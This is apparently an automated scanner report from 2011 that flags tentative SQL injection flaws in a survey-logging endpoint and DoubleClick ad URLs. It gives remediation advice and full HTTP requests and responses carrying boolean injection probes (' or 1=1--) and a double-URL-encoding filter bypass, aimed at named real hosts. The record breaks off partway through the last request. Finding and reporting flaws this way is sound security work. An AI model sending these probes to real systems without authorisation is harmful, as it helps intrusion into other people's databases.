SQL Injection, DORK, Proof of Concept, CWE-89, CAPEC-66

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 2] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://a.dlqm.net
Path:	/adscgen/log_ut_err.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adscgen/log_ut_err.php%2527?adserver=DART&survey_num=865756&site=57865895-57865895-&code=39213494 HTTP/1.1
Host: a.dlqm.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:03:06 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1046

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adscgen/log_ut_err.php%2527%2527?adserver=DART&survey_num=865756&site=57865895-57865895-&code=39213494 HTTP/1.1
Host: a.dlqm.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:03:08 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 226
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adscgen/log_ut_err.php%27%27 was not found on this s
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/N5776.google.comOX2416/B5111410.16

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13383482'%20or%201%3d1--%20 and 13383482'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\&113383482'%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7745
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:05 GMT
Expires: Thu, 03 Feb 2011 16:09:05 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2656415/1-ally_en_interest_checking_160x600.swf";
var gif = "http://s0.2mdn.net/2656415/ally_en_interest_checking_160x600.jpg";
var minV = 9;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/220/%2a/r%3B234019457%3B0-0%3B0%3B57865897%3B2321-160/600%3B39213497/39231284/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/220/%2a/r%3B234019457%3B0-0%3B0%3B57865897%3B2321-160/600%3B39213497/39231284/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lh
...[SNIP]...

Request 2

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\&113383482'%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7779
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:05 GMT
Expires: Thu, 03 Feb 2011 16:09:05 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2656415/6-ally-no_fear-160x600.swf";
var gif = "http://s0.2mdn.net/2656415/ally-no_fear-160x600.jpg";
var minV = 9;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/220/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/220/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY2
...[SNIP]...

1.3. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/N5776.google.comOX2416/B5111410.18

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:06:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7405

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2656415/1-ally_en_interest_checking_300x250.swf";
var gif = "http://s0.2mdn.net/2656415/ally_en_interest_checking_300x250.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1cb/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1cb/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367
...[SNIP]...

Request 2

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:07:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7439

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2656415/5-ally-no_fear-300x250.swf";
var gif = "http://s0.2mdn.net/2656415/ally-no_fear-300x250.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1cb/%2a/r%3B233905705%3B1-0%3B0%3B57865904%3B4307-300/250%3B40155598/40173385/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1cb/%2a/r%3B233905705%3B1-0%3B0%3B57865904%3B4307-300/250%3B40155598/40173385/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%
...[SNIP]...

1.4. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/N5776.google.comOX2416/B5111410.18

Issue detail

The sig parameter appears to be vulnerable to SQL injection attacks. The payloads 59241290'%20or%201%3d1--%20 and 59241290'%20or%201%3d2--%20 were each submitted in the sig parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw59241290'%20or%201%3d1--%20&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7513

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2656415/1-ally_en_interest_checking_300x250.swf";
var gif = "http://s0.2mdn.net/2656415/ally_en_interest_checking_300x250.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e6/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw59241290'%20or%201%3d1--%20&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e6/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD
...[SNIP]...

Request 2

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw59241290'%20or%201%3d2--%20&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
